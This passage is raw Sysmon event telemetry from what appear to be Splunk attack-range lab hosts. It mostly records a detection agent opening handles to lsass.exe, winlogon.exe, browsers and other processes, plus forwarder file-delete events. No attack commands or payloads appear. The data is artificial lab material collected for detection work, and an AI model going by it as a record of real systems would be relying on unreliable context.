23542300x800000000000000044669Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:51.809{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEB3890EC0A5249EDFAA26407E708842,SHA256=03B432CE65B799B6981EFCA40B13DE0CCC69137C3D38843A95EEB35B52D9B279,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000044668Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:51.807{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044667Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:51.800{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044666Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:51.793{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044665Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:51.782{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044664Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:51.777{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044663Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:51.768{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044662Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:51.761{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000044661Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:51.748{FE4C2B44-DA03-63C7-2400-00000000AF02}2492NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-08771daebc39497be\channels\health\surveyor-20230118113739-046MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017283Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:51.357{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF6222CFA74B360540715F84973829BF,SHA256=6CCE8720CFE6335C1B71690D968CC9EE7B9FAB9FF4BF99F0BD8E2F596F7DE38B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044660Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:51.716{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044659Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:51.701{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 23542300x800000000000000044686Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:52.852{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89146B51911AF21691A5A988FAD6110D,SHA256=110EEC339C780F775CEDF2014C98A6E41F77BBD2815807B4A05B2C5DA990D261,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017284Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:52.443{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27F454CA6673BC4A84DE25EC3DB0B11A,SHA256=EFAC0824A83950EFDD931EA07344E690724F9D52B65D911AE1A5D4E91E930620,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044685Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:52.226{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 23542300x800000000000000017285Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:53.521{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA55420C56988ED2EDEEE7005D6CF6BD,SHA256=F5744BF2224BEDA827C96FA7ED65913DCF9625EDAE656AC34A8B50505B9201EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044687Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:53.907{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=964D3811936A17DEF4526B85D20D4030,SHA256=EBA62F7883AF9FFC650C8DC597A814DD51B4D749EF764AEA414A59F0F17E06DA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000017286Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:54.599{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C279F2304A5E7C255DC74231A0C8C3A,SHA256=F8254F5DBCF2CFCD2A3E968D34DEDFC22D41CB6590AA2CAB185B399C8DF95961,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044725Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.938{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-5006-00000000AF02}3588C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044724Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.936{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4F06-00000000AF02}5500C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044723Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.929{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A4-63C7-4E06-00000000AF02}5088C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044722Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.924{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4D06-00000000AF02}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044721Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.921{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044720Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.918{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044719Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.916{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4A06-00000000AF02}1884C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044718Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.907{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044717Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.894{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044716Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.883{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044715Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.878{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044714Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.868{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044713Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.867{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044712Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.866{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044711Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.866{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080610) 10341000x800000000000000044710Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:54.864{FE4C2B44-DE08-63C7-F104-00000000AF02}60683768C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program 